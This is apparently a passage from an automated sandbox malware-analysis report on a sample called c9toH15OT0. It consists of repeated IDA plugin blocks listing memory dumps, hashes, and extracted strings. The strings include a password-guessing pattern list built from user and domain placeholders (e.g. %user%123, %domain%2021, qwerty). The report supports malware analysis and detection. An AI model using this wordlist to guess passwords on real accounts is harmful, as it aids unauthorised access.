                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: 8dc34f87dd242f8a8b1dd32e13b9bd48eafeedda503d68c902e2aff717762975
                                            • Instruction ID: 2996a39efc36e00a60b6e30b35fcd16d317daee87fc1c383e4529796a744f3d5
                                            • Opcode Fuzzy Hash: 8dc34f87dd242f8a8b1dd32e13b9bd48eafeedda503d68c902e2aff717762975
                                            • Instruction Fuzzy Hash: B871822160CB8281E610DB53E4A43AAA7A0FF85BC8F584175EE8DA7BA9DF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: aa8c49256f74dfbdf12c17acdeaabfe79dce15886d218bb17dcf4aece0496426
                                            • Instruction ID: d7e973c013756a30d0c6e1b333073e0bef02e24d5ee59b0652f8d24bc8594f89
                                            • Opcode Fuzzy Hash: aa8c49256f74dfbdf12c17acdeaabfe79dce15886d218bb17dcf4aece0496426
                                            • Instruction Fuzzy Hash: F471722160CB8281E610DB53E4A43AAA7A0FF85BC8F584175EE8DA7BA9DF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: ff26d8f011d540d1bdb5dce56cd591f852c5d5750f7832a40876df0c8669a5e2
                                            • Instruction ID: 00fd68d5cb5baa8542f7e0f85c06ed85ddb1359bf42b8942b22a8581175d933d
                                            • Opcode Fuzzy Hash: ff26d8f011d540d1bdb5dce56cd591f852c5d5750f7832a40876df0c8669a5e2
                                            • Instruction Fuzzy Hash: 7B71722160CB8281E610DB53E4A43AAA7A0FF85BC8F584175EECDA7BA9DF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: 0123cf3666a85509c0dc5070cfbe37b5c5ecf48e3de45491ed970d5e2ddbf894
                                            • Instruction ID: afa865c5f309dc21c3e9a22c53bdf1e7c3775750d33ce4c39ae0d8a9ca8bed79
                                            • Opcode Fuzzy Hash: 0123cf3666a85509c0dc5070cfbe37b5c5ecf48e3de45491ed970d5e2ddbf894
                                            • Instruction Fuzzy Hash: 9C71722150CB8281EA10DB53E4A43AAA7A0FF85BC8F584175EECDA7BA9DF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: 52137168f765a07b782b6cb4db5ebc901f23ffecb4fa919c6a6554fccbedd461
                                            • Instruction ID: afa865c5f309dc21c3e9a22c53bdf1e7c3775750d33ce4c39ae0d8a9ca8bed79
                                            • Opcode Fuzzy Hash: 52137168f765a07b782b6cb4db5ebc901f23ffecb4fa919c6a6554fccbedd461
                                            • Instruction Fuzzy Hash: 9C71722150CB8281EA10DB53E4A43AAA7A0FF85BC8F584175EECDA7BA9DF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: 48b4ce9544e9a6bf0ff4a9d125c873f4d983e493782de10f0965295f8a061196
                                            • Instruction ID: afa865c5f309dc21c3e9a22c53bdf1e7c3775750d33ce4c39ae0d8a9ca8bed79
                                            • Opcode Fuzzy Hash: 48b4ce9544e9a6bf0ff4a9d125c873f4d983e493782de10f0965295f8a061196
                                            • Instruction Fuzzy Hash: 9C71722150CB8281EA10DB53E4A43AAA7A0FF85BC8F584175EECDA7BA9DF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: 5e389ace47a9ebdde38a975fb46664b0472424e479eefb3a2771b49a04f27fa8
                                            • Instruction ID: afa865c5f309dc21c3e9a22c53bdf1e7c3775750d33ce4c39ae0d8a9ca8bed79
                                            • Opcode Fuzzy Hash: 5e389ace47a9ebdde38a975fb46664b0472424e479eefb3a2771b49a04f27fa8
                                            • Instruction Fuzzy Hash: 9C71722150CB8281EA10DB53E4A43AAA7A0FF85BC8F584175EECDA7BA9DF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: 5d292ef5683ca81b67c19f021b6a168cf1920a6a563ec025c22ed3ffd2a73588
                                            • Instruction ID: cd3fff2e38ea26f35b94ce4078a37d8c8c446923fb7f2310f36213892f8819c7
                                            • Opcode Fuzzy Hash: 5d292ef5683ca81b67c19f021b6a168cf1920a6a563ec025c22ed3ffd2a73588
                                            • Instruction Fuzzy Hash: FA71712160CB8281E610DB53E4A43AAA7A0FF85BC8F584175EECDA7BA9DF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: d2ddfd09bb72f94a6364481ca3f9fc6fe69e1de01b30ad2303f5a79f033678f6
                                            • Instruction ID: afa865c5f309dc21c3e9a22c53bdf1e7c3775750d33ce4c39ae0d8a9ca8bed79
                                            • Opcode Fuzzy Hash: d2ddfd09bb72f94a6364481ca3f9fc6fe69e1de01b30ad2303f5a79f033678f6
                                            • Instruction Fuzzy Hash: 9C71722150CB8281EA10DB53E4A43AAA7A0FF85BC8F584175EECDA7BA9DF7DD145C700
                                            APIs
                                            Strings
                                            • %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2, xrefs: 00007FF6543A60C6, 00007FF6543A6134
                                            • _..., xrefs: 00007FF6543A6209
                                            • %user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%, xrefs: 00007FF6543A618E, 00007FF6543A62A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: %domain%%user%abc%user%abc123%domain%2016%domain%2015%domain%2014%domain%2013%domain%2012%domain%2011%domain%2010%domain%2009%domain%2008%domain%2007%domain%2006%domain%2005%domain%2004%domain%2003%domain%2002%domain%2001%domain%2000%user%2014%user%2013%user%2$%user%roottnqwertyqwertyuiqwertyuiop%domain%2022%domain%2023%domain%2024%domain%2021%domain%2020%user%@2020%domain%@2021%domain%@20201020301234teste%user%123123%user%%user%321321%user%123%domain%%user%1234%domain%1234123456%domain%%user%abc%user%abc123%domain%$_...
                                            • API String ID: 1887603139-2523241062
                                            • Opcode ID: aa3bb10b885e3f4ee73ad7fdf2f3905d406da42fcc9c479ec55bd26fc7596714
                                            • Instruction ID: afa865c5f309dc21c3e9a22c53bdf1e7c3775750d33ce4c39ae0d8a9ca8bed79
                                            • Opcode Fuzzy Hash: aa3bb10b885e3f4ee73ad7fdf2f3905d406da42fcc9c479ec55bd26fc7596714
                                            • Instruction Fuzzy Hash: 9C71722150CB8281EA10DB53E4A43AAA7A0FF85BC8F584175EECDA7BA9DF7DD145C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
